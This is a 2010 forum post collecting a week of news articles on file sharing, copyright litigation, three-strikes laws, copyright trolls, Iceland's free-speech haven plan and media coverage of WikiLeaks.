Go Back   P2P-Zone > Peer to Peer
FAQ Members List Calendar Search Today's Posts Mark Forums Read

Peer to Peer The 3rd millenium technology!

Thread Tools Search this Thread Display Modes
Old 27-10-10, 06:41 AM   #1
JackSpratts's Avatar
Join Date: May 2001
Location: New England
Posts: 10,009
Default Peer-To-Peer News - The Week In Review - October 30th, '10

Since 2002

"As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed. Double-click on someone, and you're instantly logged in as them." – Eric Butler

"I dont think you can ever take away from a movie theater. I am an avid movie lover - getting pirated works was my cheap fix - going to the theaters, well shit. That's the good stuff right there." – anononline

"Most of the bootleg copies are out there, because I lent it to people." – Stephen Sondheim

Scener Spills Beans on Social Site

An anonymous poster claiming to be a long time member of an infamous scene bootleg crew, those shadowy groups known for releasing high quality copies of current Hollywood films, came out of the cold to talk at the news and comment site reddit.com.

Now retired, the self described pirate known only as “anononline” answered member’s questions, posted anecdotes and told stories about his time in the secretive world of the scene.

If his outlaw years once guaranteed him high octane excitement, he clearly looks back on them now with ambivalence, allowing that he spent “staggering. unbelievably staggering” amounts of time consumed with being first to release, and acknowledging that the life took a personal toll on others as well, leading to prison, drug addiction and suicide.

Nevertheless he says he’s doing fine today, and he’s proud of the fact that some of his former peers are too, one having quit drugs, one finding work in film and another having gone into politics.



October 30th, 2010

Judge Tells LimeWire, the File-Trading Service, to Disable Its Software
Tim Arango

A federal judge in New York issued an injunction on Tuesday that will essentially shut down LimeWire, the big music file-sharing service that has been mired in a four-year legal struggle with the music industry. The case has already resulted in the company and its founder being found liable for potentially hundreds of millions of dollars in damages.

Although LimeWire, the file-sharing service that allows users to swap music that is a major descendant of Napster, is on the verge of vanishing in its current form, the company will continue negotiations with the major music companies about a licensing deal to offer music legally for sale with a subscription service.

“While this is not our ideal path, we hope to work with the music industry in moving forward,” the company said in a statement. “We look forward to embracing necessary changes and collaborating with the entire music industry in the future.”

In her ruling, Judge Kimba M. Wood of Federal District Court in Manhattan forced the company to disable “searching, downloading, uploading, file trading and/or file distribution functionality” of the company’s file-sharing software.

On Tuesday afternoon, visitors to LimeWire’s Web site were greeted with a legal notice and the words, “downloading or sharing copyrighted content without authorization is illegal.” Much of the site was shutdown, but there was a link to a copy of the injunction.

LimeWire, founded in 2000 by Mark Gorton, a successful Wall Street trader, now appears to be headed the way of the former Internet pirates Napster and Grokster, both of which lost legal battles against the music industry.

In a statement Tuesday, the Recording Industry Association of America, the music industry’s trade group that had managed the suit, said: “For the better part of the last decade, LimeWire and Gorton have violated the law. The court has now signed an injunction that will start to unwind the massive piracy machine that LimeWire and Gorton used to enrich themselves immensely.”

The legal fight does not end here. In May, Judge Wood ruled that the company had violated copyright law and was liable for damages. The court is scheduled to decide early next year the amount the company and Mr. Gorton will be forced to pay.

“In January, the court will conduct a trial to determine the appropriate level of damages necessary to compensate the record companies for the billions and billions of illegal downloads that occurred through the LimeWire system,” the recording association said in its statement.

P2P File-Sharing Software FrostWire Launches on Android Market
Gary Cutlack

The multi-protocol file-sharing tool FrostWire has just launched its Android app on the Android Market, promising to bring the world of potentially dubious P2P content to your poor little SD card via the Android Market.

It’s been available on Android for some time via direct download, now it’s up on the Market for the mainstream users. Here’s the list of Android features, courtesy of FrostWire itself:

- Search & download files on millions of devices
- Browse & download files from your closest peers
- Share files on Social Networks
- Explore, rename and use your own files
- P2P Chat room
- Send private messages w/attachments
- Control what you share
- Auto-updates

Plus the Android app won’t work via 3G due to obvious reasons to do with being a massive bandwidth and data eater. Here’s a nice little montage of images of the app in action, issued by FrostWire:

If you would like to try it for free, there’s a direct download of the Android APK hosted on FrostWire’s site here – whereas the Android Market version comes with a $4.99 price tag attached to it.

Dead Drops
Aram Bartholl

I am pleased to preview ‘Dead Drops’ a new project which I started off as part of my ongoing EYEBEAM residency in NYC the last couple weeks. ‘Dead Drops’ is an anonymous, offline, peer to peer file-sharing network in public space. I am ‘injecting’ USB flash drives into walls, buildings and curbs accessable to anybody in public space. You are invited to go to these places (so far 5 in NYC) to drop or find files on a dead drop. Plug your laptop to a wall, house or pole to share your files and date. Each dead drop contains a readme.txt file explaining the project. ‘Dead Drops’ is still in progress, to be continued here and in more cities. Full documentation, movie, map and ‘How to make your own dead drop’ manual coming soon! Stay tuned.

Jailbreaking Your iPhone? Legal! Jailbreaking Your Xbox? 3 Years In Jail!
Mike Masnick

Bunnie Huang is no stranger to absolutely ridiculous legal claims concerning trying to hack an Xbox. After doing so, he had trouble publishing a book on the subject, over fears that telling people how to modify a piece of electronics they had legally purchased might somehow violate copyright law (anyone else see a problem with that?). Now, techflaws.org points us to the news that Huang is scheduled to testify on behalf of a guy facing jailtime for modifying Xboxes. But US officials are trying to bar his testimony, claiming it's "not legally relevant." Technically, they're probably right. But, from a common sense standpoint, Huang is trying to make a bunch of important points.

First, let's take a step back, and realize just how ridiculous this situation is. If you buy a piece of electronic equipment, should you ever deserve jailtime for then modifying it? With most things you buy, you have every right to then make changes to it. Yet, when it comes to gaming consoles, suddenly that can get you jailtime. The culprit? Of course, it's the ever-present DMCA, and its anti-circumvention clause, which lets any device maker put in some "technological protection measures," and suddenly it's illegal to modify what you thought you legally owned.

Now, supporters of the DMCA will note that every few years we have the lovely "exceptions" process, whereby the Librarian of Congress gets to (somewhat arbitrarily) choose what things won't get covered by the anti-circumvention clause. Just a few months ago, for example, it was deemed "ok" to jailbreak your mobile phone. So, here's the conundrum: it's perfectly legal to jailbreak your iPhone, but you can get thrown in jail for jailbreaking your Xbox. Explain that.

Huang wants to testify on behalf of Matthew Crippen, who would jailbreak Xboxes. Huang planned to show the jury just how easy it was to mod an Xbox. While he doesn't say so, my assumption is that the idea is to show that, and then suggest that the anti-circumvention provision does not apply because it shows that the Xbox's technological protection measures are not "effective," and the anti-circumvention provisions are only designed to apply to "a technological measure that effectively controls access to a work protected under this title." Similar arguments have actually worked in Europe, though I'm not sure if they'll work here.

Either way, I'm guessing the court won't allow Huang to testify for a variety of legal reasons, but even if he doesn't, it would be nice if the court and anyone else could explain why jailbreaking an iPhone is fine while jailbreaking an Xbox gets you jailtime.

Jammie Thomas Set for Third Trial
Eamonn Forde

Jammie Thomas will face a third trail in the US as she contests the fines imposed on her for alleged filesharing activity.

She was accused of downloading and sharing 24 tracks on Kazaa in 2005. Her first trial began in 2007 and she was found to be guilty of willful copyright infringement and ordered to pay statutory damages of $222k (£140k).

A retrial happened in 2009 and she was ordered to pay $1.92m (£1.21m) in damages to the RIAA. A judge reduced the fine to $54k (£34k) and the RIAA then offered a settlement of $25k (£16k) but Thomas and her lawyers declined.

In June, Thomas' legal team requested the fine be reduced yet further, but the judge in the case refused, meaning that a third hearing is now scheduled to take place on November 2.

Universal Music Denied Rehearing Over Eminem Royalty Case

A federal court has denied Universal Music Group's request for a rehearing in the court case over digital sales royalties for Eminem. Last month, a California federal appeals court ruled in favor of Eminem and his producers in a court battle against UMG, with a decision over iTunes and digital music royalties that could have far-reaching effects in the music industry.

The Detroit Free Press reports that the U.S. 9th Circuit Court of Appeals denied UMG's petition for a rehearing and that the label's only remaining legal option would be an appeal to the Supreme Court. In the meantime, the case is expected to return to a lower court in Los Angeles.

In September, the California appeals court reversed a lower-court jury decision from 2009, ruling that Em and his production company were due almost three times as many royalties as they had received for digital sales of songs and ringtones. In the suit, Eminem's former production company, FBT Productions claimed that selling songs via iTunes was similar to licensing deals for music and TV and should award a 50 percent royalty rate, while UMG said a standard 18 percent royalty rate should be the norm, a la physical sales.

French Three Strikes Agency Getting 25,000 Complaints a Day
Matthew Lasar

Nobody knows how many file sharers are getting warnings from France's new P2P infringement authority, but Billboard.biz says that French labels are sending 25,000 complaints a day to Hadopi, the agency enforcing that country's "three strikes" law.

The figure comes from David El Sayegh, the head of France's music label trade association, who insists that he doesn't know how many warnings have gone out as a consequence of the stream of complaints. "It is too early," Sayegh told Billboard, but also says that he expects to have an assessment of the impact Hadopi is having on digital sales by early next year.

We're presuming that rights holders hope that legal digital sales will go up, and alleged infringements will go down. Maybe so, but a study released just after the law's passage last year suggested an uptick in areas the legislation doesn't cover, like one-click downloading sites such as Rapidshare.

France's tough online infringement law allows Hadopi to, following a complaint, track down the user in question, initiate a warning process, and ultimately boot the consumer off his or her ISP if the subscriber doesn't comply with instructions to behave.

"Insiders," Billboard reports, say HADOPI is moving cautiously in response to the complaints: "There were fears that their hotline would be overloaded by people calling after having received a warning, or by people protesting at the HADOPI system. Billboard.biz understands the hotline remained much quieter than initially feared."

French Torrent Site Launches VPN to Conceal Filesharers' Identities
Eamonn Forde

Torrent tracker Smartorrent has launched a VPN (virtual private network) in France to offer filesharers anonymity.

As the country rolls out its 'three strikes' anti-piracy legislation, Smartorrent has offered to cloak users' identities so they can continue filesharing.

TorrentFreak reports that 2,500 of the site's 1.7m registered users have signed up to the SmartVPN service, which costs €5 (£4.37) a month.

Smartorrent co-founder Clever told TorrentFreak, “Since the adoption of this new Hadopi law we thought about starting a VPN service. We wanted to give our beloved users the ability to keep downloading safely by using our VPN servers that are located in Canada.”

Hadopi is currently sending out 25,000 warning letters a day in France.

A Look At How Many People Have Been Kicked Offline In Korea On Accusations (Not Convictions) Of Infringement
Mike Masnick

With the Hadopi three strikes program in France kicking into full speed, it may be worth jumping halfway around the world to South Korea, which put in place a very strict copyright law last year, that included the ability to kick people offline for accusations (not convictions) of file sharing. It's worth noting, of course, that the reason South Korea put in place such a draconian copyright law was due to serious diplomatic pressure from the US as a part of a supposed "free trade" agreement between the two countries. It's also worth pointing out that the trade agreement between South Korea and the US was, according to many, the basis for the initial draft of ACTA (though, obviously, it's changed a lot since then).

So, now that the law has been in place for over a year, what's been happening in South Korea? Well, it turns out that people are getting kicked offline for accusations of filing sharing -- but worryingly, it appears they're being kicked off with one strike, not three. Glyn Moody points us to a report on the data behind what's going on in South Korea.

Now, it's important to understand the specifics of the law there. There are two ways a user can have his or her account suspended. The first is if the Minister of Culture orders the ISP to suspend the user. However, this can only come after the user has been warned three times (hence: three strikes). However, there's also a separate way, which is that the Copyright Commission can "recommend" that ISPs warn someone, block or delete materials believed to be infringing or suspend accounts. Deleting or suspending doesn't require any prior notice or warnings or anything. Basically, the Commission says "we recommend you censor this content and/or suspend this user" and the ISPs then have a choice to make. Guess what they do? That's right, they obey. Nearly every time. Out of over 65,000 "recommendations" by the Commission, ISPs have only declined to follow the recommendation 40 times -- 20 times in sending out warnings and 20 times in deleting content. It's never declined to follow a recommendation to suspend an account.

Below is the full chart of data concerning the Copyright Committee's recommendations, and what was done about them:
Hopefully, it's clear what's going on. Basically, the Commission has sent out a lot of warnings, and blocked/deleted a ton of content. A total of 31 users have had their accounts suspended -- again, with no indication that there was any number of warnings or pre-notice at all. Separately, the blog post in question does note that the other method (the actual three strikes way, involving the Culture Minister) has sent out a much smaller 275 warnings and 41 orders to delete content, but none to suspend accounts.

Has Illegal Filesharing Just Become "a Little Cheaper" in Germany?
Birgit Clark

An interesting decision on damages in cases of copyright infringing file-sharing has been handed down by the Regional Court Hamburg (LG Hamburg, decision of 8 October 2010, case reference 308 O 710/09).

In a press release the Hamburg court informs that it decided that a 16 year old file-sharer was only liable to pay damages of 15 Euros for each title he had illegally shared online. In this case the overall damages amounted to 30 Euros for two songs he had offered illegally on an Internet file sharing site. The claimant, who owned the distribution rights for these songs, had asked for damages of 300 Euros per title, which appears to be a fairly common amount usually awarded for such damages.

When deciding the amount of damages to be awarded - which had to be based on what a respective licence for these songs would have cost ("fiktiver Lizenzvertrag") - the court took into consideration that titles in question were songs of well-known artists (at least well known in Germany: the song "Engel" by Rammstein and the song "Dreh‘ dich nicht um“ by German singer song writer Westernhagen. However, the court also took into consideration that the songs were already several years old when they were offered online. As such, the court assumed that there was little demand for the songs. Furthermore, the court held that it was important that the songs had only been offered for a short time and the court hence assumed that each song had only been downloaded about one hundred times.

The Hamburg court further held that the father of the 16 year old was not liable for copyright infringement. While he had allowed his son to use the Internet access and was to regarded a "disturber" ("Störer") and had a duty of care ("Überwachungspflicht") concerning the Internet access that was used to commit the copyright infringing acts under the German principle of disturber liability. However, the father had not himself committed copyright infringement and as such was not liable for damages.

This Kat will certainly not go as far as to say that copyright infringement in German has just become a little bit cheaper, since every case very much will turn on its specific facts, but this decision by the Hamburg court nonetheless gives a good indication that the German courts appear to adopt a rather pragmatic real life approach when assessing the level of damages to be awarded.

The court's press release can be accessed here.

Facebook Buys into File-Sharing

Social networking giant snaps up New York based start-up drop.io
Phil Muncaster

Facebook has acquired most of the assets of file-sharing service provider drop.io in a deal which will see the company wind-down by December and its founder move to the social networking giant.

Drop.io is an online collaboration and file-sharing service which uses the concept of user-controlled personal sharing points known as ‘drops’ through which users can upload and share content privately via a drag-and drop interface.

Facebook will gain most of the New York based start-up’s technology and assets, drop.io revealed in a blog post.

Its founder, Sam Lessin, will be moving to Facebook full time where presumably he will work on developing similar services to be integrated into the social network.

“In the coming weeks, we’ll be winding down the drop.io service. As of this week, people will no longer be able to create new free drops, but you’ll be able to download content from existing drops until 15 December,” noted the posting.

“Paid user accounts will still be available through 15 December and paid users will be able to continue using the service normally. After 15 December, paid accounts will be discontinued as well.”

The firm said that other drop.io services like Presslift, its Yahoo Mail application, and APIs will stay online for a longer period before the company winds down.

“We’ll announce more details on that soon. However, starting immediately, we’ll no longer be selling new premium accounts for those services,” it explained.

BBC Admits Mark Thomas Filesharing Show Contained Inaccuracies

Trust committee partly upholds Feargal Sharkey complaint but rejects claim that programme was 'biased and prejudicial'

Mark Thomas presents The Culture Show Mark Thomas presents The Culture Show's special on music piracy

The BBC has admitted that parts of a controversial Culture Show report by comedian and political activist Mark Thomas on filesharing were inaccurate, but denied a complaint by UK Music chief executive Feargal Sharkey that it was "biased and prejudicial".

Thomas's Culture Show report, which aired on the BBC2 show in February this year, examined the Digital Economy Bill which was then going through parliament and its attempt to crack down on illegal downloading.

The comedian, who opposed that part of the bill – which has since become law – said on the show that it enabled film and music industry bodies to cut off people's internet access on the "bare minimum of evidence".

Sharkey, who spoke in favour of the bill on The Culture Show, said in his complaint to the BBC that Thomas's report was "not only grossly misleading and inaccurate, but also misinformed the audience in a bias [sic] and prejudicial manner, thereby contravening the BBC's editorial guidelines relating to accuracy and impartiality". His complaint was part upheld with regard to accuracy and not upheld with regard to impartiality.

Sharkey, who had demanded an on-air retraction and apology, took his complaint to the BBC's highest arbiter, the BBC Trust's editorial standards committee, after his initial concerns were largely rejected by the corporation's management.

The trust committee, in its ruling today, said Thomas's report was an "authored" piece and was "not to be taken as if it were a report by a BBC presenter or reporter".

But it admitted it "might have been better for the introduction to have more clearly indicated that the report was authored".

The ESC said the "section of the report on the likely effects of the new bill had given the audience an inaccurate description of how the process of disconnection would work", adding that in "attempting to paraphrase the legal complexities of the bill the report had not been sufficiently precise and had been inaccurate".

"Use of the word 'criminalise' in the introduction to the report was inaccurate but that this aspect of the complaint had been satisfactorily dealt with by the programme at the earliest opportunity," the committee added.

The report had also "not retained a respect for factual accuracy ... with regard to the implication given that the secretary of state had unfettered discretion to amend the law on copyright without parliamentary scrutiny".

Critics of Thomas's report claimed he had given much more time to opponents of the bill – 8 minutes and 20 seconds out of a total of 10 minutes, according to Sharkey – than its supporters.

But the BBC Trust committee ruled that the programme had not breached BBC guidelines on impartiality.

"While Mark Thomas had expressed strong personal opinions in his links to camera, this was permitted by the guidelines on authored programmes. All the main views, including those that contradicted Mark Thomas's, were reflected," the committee said.

"Bias on a controversial subject had been avoided and ... impartiality had been achieved in a way that was adequate and appropriate to the output," the ESC added.

Local News Website Says You Need To Pay To Read Its Stories, Says It's Collecting Visitor IPs To Sue
Mike Masnick

Well, here's a fun one. Apparently, there's a local news site known as The North Country Gazette (don't click that just yet...) covering parts of upstate New York via a blog format. Rather than putting in place an actual technical paywall, the site has apparently decided to go with a paywall-by-threat model. If you visit a story on the site, it tells you that you're only allowed to view one page for free, and then they expect you to pay up:

Gotta love that Comic Sans font -- in red, no less. Anyway, if you do "abuse the privilege," apparently you come up against the following (which now appears to have been taken down, perhaps due to all of the attention):

In case you can't see/read the image, it reads:

A subscription is required at North Country Gazette. We allow only one free read per visitor. We are currently gathering IPs and computer info on persistent intruders who refuse to buy subscription and are engaging in a theft of services. We have engaged an attorney who will be doing a bulk subpoena demand on each ISP involved, particularly Verizon Droids, Frontier and Road Runner, and will then pursue individual legal actions.
Where to start? First, I love how "Verizon Droid" (a phone) is included in the list of ISPs. But, more to the point, this site seems to believe that if it just says you can only visit once without paying, and you don't, it has the right to then use your IP to sue you for "theft of services." I'd love to see how well that plays out in court.

The $105 Fix That Could Protect You From Copyright-Troll Lawsuits
David Kravets

Call it ingenious, call it evil or call it a little of both: Copyright troll Righthaven is exploiting a loophole in intellectual property law, suing websites that might have avoided any trace of civil liability had they spent a mere $105.

That’s the fee for a blog or other website to register a DMCA takedown agent with the U.S. Copyright Office, an obscure bureaucratic prerequisite to enjoying a legal “safe harbor” from copyright lawsuits over third-party posts, such as reader comments.

There’s no better time to become acquainted with that requirement.

Founded in March, the Las Vegas-based Righthaven has begun buying out the copyrights to newspaper content of the Las Vegas Review-Journal for the sole purpose of suing blogs and websites that re-post, or even excerpt, those articles without permission. The company has settled about 60 of 160 cases for a few thousand dollars each, and plans to expand its operations to other newspapers across the country.

Many of its lawsuits arise, not from articles posted by a website’s proprietors, but from comments and forum posts by the site’s readers. Under the Digital Millennium Copyright Act, a website enjoys effective immunity from civil copyright liability for user content, provided they, promptly remove infringing material at the request of a rightsholder. That’s how sites like YouTube are able to exist, and why Wired.com allows users to post comments to our stories without fear that a single user’s cut-and-paste will cost us $150,000 in court.

But to dock in that legal safe harbor, a site has to, among other things, register an official contact point for DMCA takedown notices, a process that involves filling out a form and mailing a check to the government. An examination of Righthaven’s lawsuits targeting user content suggests it’s specifically going after sites that failed to fill out that paperwork.

“The DMCA is a good deterrent from being sued,” says Kurt Opsahl, a staff attorney with the Electronic Frontier Foundation, “Complying with conditions of eligibility for the safe harbor is a good thing to do. It probably will prevent somebody from suing you in the first place.”

The EFF is defending political community site Democratic Underground from a Righthaven suit stemming from a user’s posting of four paragraphs from a 34-paragraph Review-Journal story on Sharron Angle, the Republican Nevada candidate for Senate entitled “Tea party fuels Angle.” The brevity of the excerpt, and the fact that the post links back to the original story, gives Democratic Underground a strong fair use defense. But had it registered with the Copyright Office, it wouldn’t even have to make that argument.

Opsahl doesn’t believe any of the sites Righthaven has sued had a designated agent, though not all of the cases involve user posts. (Righthaven did not respond to inquiries for this story.)

If you run a U.S. blog or a community site that accepts user content, you can register a DMCA agent by downloading this form (.pdf) and sending $105 and the form to Copyright RRP, Box 71537, Washington, D.C., 20024.

Opsahl and other experts note that failing to qualify for the DMCA safe harbor still leaves you with fact-based defenses from a lawsuit, including the defense, supported by some case law, that infringing third-party posts aren’t your responsibility.

Ben Sheffner, a Hollywood copyright attorney and the man behind the must-read blog Copyrights & Campaigns, says there is a reason the DMCA demands a takedown agent, which is supported by a recent court ruling.

“The idea is you need to make it easy for copyright owners to locate who you send infringement notices to,” he says. “They shouldn’t have to go hunting around.”

The Social Network Leaked on File-Sharing Sites Ahead of its Australian Release
Andrew Ramadge

IT'S a film about one of the greatest technological changes of our generation.

But David Fincher's new movie about the creation of Facebook may find itself falling prey to another 21st-century change.

Copies of The Social Network, which opened in the US on October 1, have been posted to file-sharing sites ahead of its Australian cinema release.

Blogger "Enigmax" of file-sharing news site TorrentFreak told news.com.au that low-quality "cam" versions of the film had started to appear online.

"Cam" copies of movies are those illicitly filmed in the cinema using handheld cameras.

Enigmax said it wasn't unusual for such copies to appear several weeks after a film's release.

"The time taken for 'cam's to hit the net has extended quite a lot in recent times, from less than a day to a couple of weeks," he said.

"It's probably not that unusual (for The Social Network to appear now), but towards the top end of the scale."

The low-quality copies had been moderately popular with file-sharers, racking up about 100,000 downloads, he said.

"That said, 'good' copies of movies come out a lot sooner than they used to, so many downloaders will be skipping the 'cam' and waiting for (a better version) to come along."

Sony Pictures Australia managing director Steven Basil-Jones said piracy was a risk the company sometimes had to take when deciding when to release overseas films.

"October 1 for us was right during school vacation, which is obviously different than in the US, so we're in a different scenario with cinema availabilities," he said.

"It's really a very fundamental sales issues we're faced with."

Mr Basil-Jones said other factors that played a part in delays to film releases included the availability of film stars to do promotional tours.

"The flipside of the coin is that the longer you wait, the more open you are to piracy and the film being seen either through file-sharing or people going to Asia and picking it up at markets on DVD," he said.

"It's just that horrible equation we have to do and the risk that we have to take in delaying anything these days."

BigChampagne's Building a Social Music Chart

Entrepreneur Eric Garland thinks he has a better music chart. His secret? Tweets, status updates, and web chatter.
Steve Knopper

Before the rise of online radio station Pandora and music video sites such as Vevo -- and years before Apple (AAPL) launched its iTunes music store -- Eric Garland reckoned that the Internet was going to transform the music industry. Back in 2000, when a lot of online listening activity involved illegal peer-to-peer file sharing via services such as Napster, Garland believed that all the online activity could actually help lesser-known bands and artists market themselves, if they could just quantify their successes. So he and Tom Allison, a former Coca-Cola (COKE) marketing executive, formed BigChampagne to catalogue file sharing and MP3 downloads.

Since then, digital downloading has gone legit: The iTunes Store, which opened in 2003, has sold more than 10 billion songs. Pandora has turned a profit. Even Napster has been rebranded as a legal subscription service. And BigChampagne, based in Beverly Hills, is more relevant than ever. Today it tracks sales, downloads, and listening activity on just about every music-distribution platform, from iTunes to FM radio to MySpace. (And, yes, it still tracks illegal file sharing too.)

BigChampagne then analyzes and sells the data to record labels, talent agents, and radio stations that are looking to find under-the-radar acts. Increasingly, clients also want to gauge the impact of social media such as Twitter, which recording artists have embraced wholeheartedly. (Just check out Kanye West's Twitter feed.) In late July, BigChampagne unveiled its latest creation, the Ultimate Chart, which supplements widely available data on sales on Amazon (AMZN) and iTunes with metrics that measure a song's buzz: YouTube (GOOG) and MySpace hits, Twitter and Facebook mentions, Clear Channel radio spins, and Rhapsody and Last.fm streams. "We are certainly trying to narrow the really significant gap between the charts that are published on a week-to-week basis and the actual artist-to-fan connection," Garland says.

Industry reaction to the new list has been mixed. Reps for Billboard and Nielsen Soundscan wouldn't comment, but one music industry executive says of the Ultimate Chart: "It's like the People's Choice Awards. It's hype for the sake of hype."

Ultimate Chart rankings don't always differ wildly from sales data. Bruno Mars' "Just the Way You Are" was No. 1 on BigChampagne's list during the week of Oct. 4, as it was on the Billboard Hot 100. But the "Glee" soundtrack version of the Alicia Keys/Jay-Z New York City anthem "Empire State of Mind" hit No. 7 on BigChampagne, vs. No. 21 on Billboard. That reflects under-measured online buzz following both the "Glee goes to New York" TV episode and a viral "Late Night With Jimmy Fallon" video in which Fallon and Justin Timberlake rap the history of hip-hop in less than four minutes. "The real measure of passion is sales," says Avery Lipman, co-president of Universal Republic Records, a unit of Vivendi's Universal Music Group. "That said, how can you ignore and discount 50 million [online] plays of Lady Gaga?"

BigChampagne uses a mix of software and human referees to compile its data. Its technology monitors web searches and catalogues music in consumers' shared folders. Meanwhile, a dozen or so "matchers" sit at a bank of computers and make real-time decisions about the data. Does a track that "features" Jay-Z count as a Jay-Z track, or should it be attributed to another artist? "We have taught computers over many years to be very consistent about reconciling all this different data," Garland says. "But we've also put editors in place to settle disputes."

Garland, 38, started his career as a management consultant, but he also happened to be a file sharer and music fan. ("I've always liked pop music for old people," he says.) He won't disclose sales -- BigChampagne is privately held but in a dozen years it has expanded from its Napster-era roots and now measures data from iTunes, Amazon, eMusic, AT&T (T), YouTube, MySpace, Last.fm, Facebook, and Twitter. Garland says he plans to expand the Ultimate Chart to track the popularity of albums. He also envisions expanding to other media, such as videogames, TV, even movies. Any product that can be consumed online then tweeted or recommended or friended is a candidate for BigChampagne to measure. Critics may dismiss the company's Ultimate lists as hype, but someday they may be as mainstream as, well, digital music.

Iceland Turns from Banks to Freedom of Speech

Iceland wants companies from around the world to set up their servers there and publish material online without the fear of ruinous lawsuits or censorship. Stephen Beard reports.

Iceland hopes to host computer servers for international companies seeking freedom of speech. (Chung Sung-Jun/Getty Images)

STEVE CHIOTAKIS: Iceland has a bold new international money-making plan. But after its last foray into the global marketplace, a financial system that went haywire, should the world be worried?

STEPHEN BEARD: Iceland does not intend getting into banking again. Just as well. Those banks wound up owing about ten times more than the whole Icelandic economy. No, the country now wants to turn itself into a haven for the digital age.

BIRGITTA JONSDOTTIR: A haven for freedom of information, freedom of expression and of speech.

JONSDOTTIR: What we're doing is putting together all the best laws so that one country can set the standard for how we in the future strengthen these rights.

Iceland wants people from around the world to set up their servers there and publish material online without the fear of ruinous lawsuits or censorship. Icelanders see this as a noble aim and a business opportunity.

SMARI McCARTHY: A lot of companies will just want internet hosting services.

Smari McCarthy is also involved in the project.

McCARTHY: Other organizations might have greater needs such as operating offices from here to protect their employees.

He says the plan could turn Iceland into a refuge for whistle blowers and anyone who wants to expose corporate or official abuses. But Alistair Mullis, Professor of Law at the University of East Anlgia says it'll more likely turn Iceland into a hotbed of libel and intrusiveness.

ALISTAIR MULLIS: It will make it very difficult to sue people who are publishing defamatory material or material that's private when they are based in Iceland.

Another critic claims that Iceland will prove as reckless with reputations and with state secrets as it was with other people's money. But Smari McCarthy says Iceland merely wants to learn and profit from the disaster of its banking boom and bust.

McARTHY: This is a country that was badly burned by a strong urge by those that are in power and those who own everything to keep the general public un-informed about what they are up to.

Iceland's information haven could be up and running in a year. This is Stephen Beard for Marketplace.

More on the Media's Pentagon-Subservient WikiLeaks Coverage
Glenn Greenwald

The New York Times' John Burns yesterday responded to (and complained about) criticisms -- voiced by me, Julian Assange and others -- over his gossipy, People Magazine-style "profile" of Assange, which his newspaper centrally featured as part of its coverage of the WikiLeaks document release. In a self-justifying interview with Yahoo! News' Michael Calderone, Burns makes several comments worth examining:

Burns said he doesn't "recall ever having been the subject of such absolutely, relentless vituperation" following a story in his 35 years at the Times. He said his email inbox has been full of denunciations from readers and a number of academics at top-tier schools such as Harvard, Yale, and MIT. Some, he said, used "language that I don't think they would use at their own dinner table."
This is really good to hear: quite encouraging. Apparently, many people become quite angry when the newspaper which did more to enable the attack on Iraq than any other media outlet in the world covered one of the most significant war leaks in American history -- documents detailing the deaths of more than 100,000 human beings in that war and the heinous abuse of thousands of others -- by assigning its most celebrated war correspondent and London Bureau Chief to studiously examine and malign the totally irrelevant personality quirks, alleged mental health, and various personal relationships of Julian Assange. Imagine that. Then we have this from Burns:

Such heated reactions to the profile, Burns said, shows "just how embittered the American discourse on these two wars has become."
Oh my, how upsetting. People are so very "embittered," and over what? Just a couple of decade-long wars that have spilled enormous amounts of innocent blood, devastated two countries for no good reason, and spawned a worldwide American regime of torture, lawless imprisonment, and brutal occupation. It's nothing to get upset over. People really need to lighten up. And stop being so mean to John Burns. That's what really matters.

After all -- as he himself told you just a couple of months ago -- there was just no way that he and his war-supporting media colleagues -- holding themselves out as preeminent, not-to-be-questioned experts on that country -- could possibly have known that an attack on Iraq would have led to such devastating violence and humanitarian catastrophe (except by listening to, rather than systematically ignoring, the huge numbers of people around the world loudly warning that exactly that could happen). The last thing he should have to endure are insulting emails from people who seem to think that such episodes warrant anger and recrimination. And that's to say nothing of the obvious irony of a reporter complaining about our "embittered discourse" after he just wrote one of the sleaziest, most vicious hit pieces seen in The New York Times in quite some time.

Then there's this:

The profile, Burns said, is "an absolutely standard journalistic endeavor that we would use with any story of similar importance in the United States" . . . . Burns added that the Times is "not in the business of hagiography" but in the "business of giving our readers the fullest context for these documents" and the Assange's motivations. "To suggest that doing that is some kind of grotesque journalistic sin, and makes me a sociopath," Burns said, "strikes me as pretty odd."
This is the heart of the matter. What Burns did to Julian Assange is most certainly not a "standard journalistic endeavor" for The New York Times. If anyone doubts that, please show me any article that paper has published which trashed the mental health, psyche and personality of a high-ranking American political or military official -- a Senator or a General or a President or a cabinet secretary or even a prominent lobbyist -- based on quotes from disgruntled associates of theirs. That is not done, and it never would be.

This kind of character smear ("he's not in his right mind," pronounced a 25-year-old who sort of knows him) is reserved for people who don't matter in the world of establishment journalists -- i.e., people without power or standing in Washington and, especially, those whom American Government authorities scorn. In official Washington, Assange is a contemptible loser -- the Pentagon hates him and wants him destroyed, and therefore the "reporters" who rely on, admire and identify with Pentagon officials immediately adopt that perspective -- and that's why he was the target of this type of attack. After I wrote my criticism of this article on Monday, I was contacted by Burns' co-writer, Ravi Somaiya, who defended this article from my criticisms. I agreed to keep the exchange off-the-record at his insistence -- and I will do so -- but that was the question I kept asking: point to any instance where the NYT ever subjected Someone Who Matters in Washington to this kind of personality and mental health trashing based on the gossip and condemnation of associates. It does not exist.

As for Burns' pronouncement that "the Times is 'not in the business of hagiography'," he should probably remind himself of what he himself wrote about the Right Honorable Gen. Stanely McChrystal, after Burns had attacked Michael Hastings for daring to publish the General's own statements that reflected badly on him. Here's what Burns wrote while falling all over himself in reverence of this Great American Warrior:

[A]ll that I know about General McChrystal suggests that he is, just as the Rolling Stone article suggested, a maverick of high self-belief and intensity, uncautioned in his disregard for the conventional, but for all that a soldier with a deep belief in the military's ideals of "duty, honor, country." Though handed what many would regard as a poisoned chalice in the Afghanistan command, he had worked relentlessly to rescue America’s fortunes there. . . . grave misfortune it is, considering what is lost to America in a commander as smart, resolute and as fit for purpose as General McChrystal . . . .

General George S. Patton Jr. . . . a man who was regarded at the time, like General McChrystal in Afghanistan, as the best, and the toughest, of America's war-fighting generals. . . . In Iraq, we barely glimpsed General McChrystal, then running the super-secret special operations missions that were crucial in turning the tide against Al Qaeda and the Sunni insurgency under General Petraeus’s command; but he, too, continued the pattern of access after he took command in Afghanistan in June 2009. . . .

Reporters, of course, do best when they keep their views to themselves, to retain their impartiality. But it's safe to say that many of the men and women who have covered General McChrystal as commander if Afghanistan, or in his previous role as the top United States special forces commander, admired him, and felt at least some unease about the elements in the Rolling Stone article that ended his career.
